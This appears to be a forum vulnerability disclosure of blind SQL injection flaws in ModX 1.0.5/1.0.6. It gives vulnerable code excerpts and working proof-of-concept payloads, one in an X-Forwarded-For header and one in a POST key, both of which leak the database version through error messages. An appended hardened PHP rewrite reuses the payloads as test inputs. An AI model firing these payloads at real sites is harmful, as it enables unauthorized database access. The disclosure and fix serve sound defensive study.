bSQL inj <== ModX v. 1.0.5

Discussion in 'Web vulnerabilities' started by TeamPro, 8 Aug 2012.

  1. TeamPro
    Author: TeamPRO (c)
    Date: 22.07.2012
    Patch available: -


    Blind SQL Injection
    Requirements: user account / magic_quotes = off
    Vulnerable script: /modx-1.0.5/assets/snippets/weblogin/weblogin.inc.php
    PHP:
        // Client address is taken from request headers first, so it is attacker-controlled
        if (getenv("HTTP_CLIENT_IP")) $ip = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR")) $ip = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("REMOTE_ADDR")) $ip = getenv("REMOTE_ADDR");
        else $ip = "UNKNOWN";
        $_SESSION['ip'] = $ip;

        $itemid = isset($_REQUEST['id']) && is_numeric($_REQUEST['id']) ? $_REQUEST['id'] : 'NULL';
        $lasthittime = time();
        $a = 998;
        if ($a != 1) {
            // $ip is interpolated into the statement without any escaping
            $sql = "REPLACE INTO $dbase.`" . $table_prefix . "active_users` (internalKey, username, lasthit, action, id, ip) values(-" . $_SESSION['webInternalKey'] . ", '" . $_SESSION['webShortname'] . "', '" . $lasthittime . "', '" . $a . "', " . $itemid . ", '$ip')";
            if (!$rs = $modx->dbQuery($sql)) {
                // the failing query, attacker input included, is echoed back in the error
                $output = "error replacing into active users! SQL: " . $sql;
                return;
            }
        }
    P0C:
    Log in, then send one more request with your own cookies.
    Code:
    GET \ POST http://localhost/modx-1.0.5/
    X_FORWARDED_FOR: 127.0.0.1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'dasa
    Cookie: [mycookies]
    
    --->
    Code:
    Execution of a query to the database failed - Duplicate column name '5.0.92-log' »
    
    Blind SQL Injection
    Requirements: administrator account
    Vulnerable script: /modx-1.0.5/assets/modules/docmanager/classes/dm_backend.class.php
    PHP:
        foreach ($_POST as $key => $value) {
            if (substr($key, 0, 10) == 'update_tv_' && $value == 'yes') {
                // everything after 'update_tv_' in the POST *key* goes into the WHERE clause unchecked
                $tvKeyName = substr($key, 10);
                $typeSQL = $this->modx->db->select('*', $this->modx->getFullTableName('site_tmplvars'), 'id=' . $tvKeyName . '');
                $row = $this->modx->db->getRow($typeSQL);
                // ...
            }
        }
    P0C:
    Code:
    POST http://localhost/modx-1.0.5/manager/index.php?a=112&id=1
    
    tid=3&pids=1&template_id=3&tabAction=changeTV&update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(version(),floor(rand(0)*2)))=yes
    
    --->
    Code:
    Execution of a query to the database failed - Duplicate entry '5.0.92-log1' for key 'group_key' »
    
  2. Konqi
    I don't know about 1.0.5, but in 1.0.6 the id parameter is vulnerable, although the SQLi has no output.

    modx/manager/actions/mutate_user.dynamic.php

    PHP:
        if ($_GET['a'] == '12') { // only do this bit if the user is being edited
            // $_GET['id'] is concatenated into the WHERE clause with no cast or escaping
            $sql = "SELECT * FROM $dbase.`" . $table_prefix . "member_groups` where member=" . $_GET['id'] . "";
            $rs = mysql_query($sql);
            $limit = mysql_num_rows($rs);
            for ($i = 0; $i < $limit; $i++) {
                $currentgroup = mysql_fetch_assoc($rs);
                $groupsarray[$i] = $currentgroup['user_group'];
            }
        }
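All three snippets in this thread fail the same way: a value the client controls (the X-Forwarded-For header, the suffix of a POST key, the id query parameter) is concatenated into SQL text. The following is an added example, not MODX code, showing the hardened counterpart of each: validate to the expected type first, then bind. The function names, the 'modx_' prefix and the inputs are assumptions made for the example. One detail worth knowing about the docmanager case: PHP rewrites spaces and dots in request-variable names to underscores, which is why the payload in the first post spells its whitespace as /**/; a digits-only check on the key suffix rejects it regardless of how the whitespace is encoded.

```php
<?php
// Added example, not MODX code: hardened counterparts of the three snippets in
// this thread. client_ip(), tv_id_from_post_key(), member_groups_query() and
// the 'modx_' table prefix are names assumed for the example.

// weblogin.inc.php: only honour X-Forwarded-For when the request arrived
// through a proxy you operate, and only if the value parses as an IP; a
// string containing quotes or SQL never reaches the query. Otherwise the
// connection address is the client address.
function client_ip(array $server, array $trusted_proxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return 'UNKNOWN';
    }
    if (in_array($remote, $trusted_proxies, true)) {
        // the last hop is the one the trusted proxy itself appended
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
        $last = end($hops);
        if ($last !== false && filter_var($last, FILTER_VALIDATE_IP) !== false) {
            return $last;
        }
    }
    return $remote;
}

// Same REPLACE as the original, but every runtime value is a bound parameter.
// Returns [sql, params] so the example runs without a database; see run_query().
function active_users_replace(string $prefix, int $internalKey, string $username,
                              int $lasthit, int $action, ?int $itemid, string $ip): array
{
    $sql = "REPLACE INTO `{$prefix}active_users` (internalKey, username, lasthit, action, id, ip)"
         . " VALUES (?, ?, ?, ?, ?, ?)";
    return [$sql, [-$internalKey, $username, $lasthit, $action, $itemid, $ip]];
}

// dm_backend.class.php: the TV id is the suffix of a POST *key*. Accept it
// only if it is all decimal digits, so 'update_tv_1/**/or/**/(...)' is
// dropped instead of being spliced into the WHERE clause.
function tv_id_from_post_key(string $key, string $value): ?int
{
    if ($value !== 'yes' || strncmp($key, 'update_tv_', 10) !== 0) {
        return null;
    }
    $suffix = substr($key, 10);
    return ($suffix !== '' && ctype_digit($suffix)) ? (int) $suffix : null;
}

// mutate_user.dynamic.php: $_GET['id'] must be an integer; reject anything
// else and bind the cast value instead of concatenating it.
function member_groups_query(string $prefix, string $id): ?array
{
    if ($id === '' || !ctype_digit($id)) {
        return null;
    }
    return ["SELECT * FROM `{$prefix}member_groups` WHERE member = ?", [(int) $id]];
}

// Executes one [sql, params] pair on a PDO connection with real prepared
// statements (emulation off so the server, not the client, does the binding).
function run_query(PDO $pdo, array $pair): PDOStatement
{
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $stmt = $pdo->prepare($pair[0]);
    $stmt->execute($pair[1]);
    return $stmt;
}

// Constructed inputs reproducing the payloads posted in the thread.
$server = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => "127.0.0.1'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'dasa",
];
var_dump(client_ip($server));                 // proxy not trusted: header ignored
var_dump(client_ip($server, ['10.0.0.5']));   // trusted proxy, but the value is not an IP
var_dump(tv_id_from_post_key('update_tv_1/**/or/**/(select/**/1)', 'yes'));
var_dump(tv_id_from_post_key('update_tv_1', 'yes'));
var_dump(member_groups_query('modx_', '1 or 1=1'));
var_dump(member_groups_query('modx_', '1'));
var_dump(active_users_replace('modx_', 1, 'alice', time(), 998, null, client_ip($server)));
```

The query builders return the statement and its parameters separately so the file runs with plain `php` and no database; pass a PDO handle to run_query() to execute a pair for real. Escaping alone (the usual quick fix for the first snippet) would stop the quote-based payload but would not help the second and third, where the injected value sits in a numeric context with no quotes to break out of; type validation plus binding covers all three.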